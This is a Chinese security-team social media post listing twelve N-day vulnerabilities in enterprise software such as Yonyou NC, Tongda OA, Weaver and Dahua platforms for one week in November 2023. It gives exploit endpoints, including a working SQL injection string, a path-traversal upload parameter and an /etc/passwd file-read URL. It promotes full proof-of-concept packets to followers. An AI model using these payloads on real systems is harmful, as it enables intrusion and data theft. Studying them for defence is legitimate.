声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!
漏洞汇总系列开篇
经团队多次沟通一致决定在合法合规的前提下,每周发布部分收录的通用组件1、N Day来进行公众号及团队宣传。
自2019年至今,团队内部漏洞库数量已达4000+。
自动化漏洞实时收录1、Nday的来源不仅限于博客、各大安全平台、微信、Github、小蓝鸟等。漏洞库中近百0day,则由十余名头部厂商实验室、红队成员资源共享而来。
愿关注猫蛋儿的你,每周都能最高效率地吸收最新漏洞。祝你"学有所成,不负韶华",每次项目都能通过学到的漏洞完成项目,卷过别人保住自己不被裁员!
0x00 漏洞列表
2023年11月6-12号部分漏洞简要信息如下,后台回复“漏洞汇总”获取完整POC数据包。
1.用友移动管理系统文件上传
/maportal/appmanager/uploadApk.do?pk_obj=2.用友NC6.5 文件上传漏洞
/aim/equipmap/accept.jsp3.用友NC Cloud uploadChunk 任意文件上传
/ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=14.通达oa 前台sql注入-可获取数据库session登入后台
/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5%20where%201={`=%27`%201}%20union%20(select%20user(),database()%20from%20user%20where%201={`=`%201})--%20%275.金蝶云 SaveUserPassport 反序列导致命令执行
/k3cloud/SRM/ScpSupRegHandler6.红帆OA HFOffice sorts SQL注入
/api/switch-value/list?sorts=%5B%7B%22Field%22:%221-user%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7
7.泛微 E-mobile lang2sql 任意文件上传
/emp/lang2sql?client_type=1&lang_tag=18.大华智能物联ICC综合管理平台readpic任意文件读取漏洞
/evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd9.大华智慧园区综合管理平台 clientServer SQL注入
/portal/services/clientServer10.JeeSpringCloud uploadFile.jsp存在任意文件上传
/static/uploadify/uploadFile.jsp?uploadPath=/static/uploadify/11.IP-guard flexpaper远程命令执行漏洞
/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=12.泛微E-Office信息泄露漏洞(CVE-2023-2766)
/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini
漏洞收录
漏洞已收录于团队内部漏洞库(建设于2019年),现已收集4000+实战漏洞
现仅供团队内部使用,每月随机抽取关注者加入社群交流学习。
回复关键字【漏洞汇总】获取完整POC数据包
点击下方名片进入公众号,欢迎关注!
点个小赞你最好看
原文始发于微信公众号(猫蛋儿安全):【漏洞汇总】2023.11(6-12) 1、N Day漏洞汇总
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论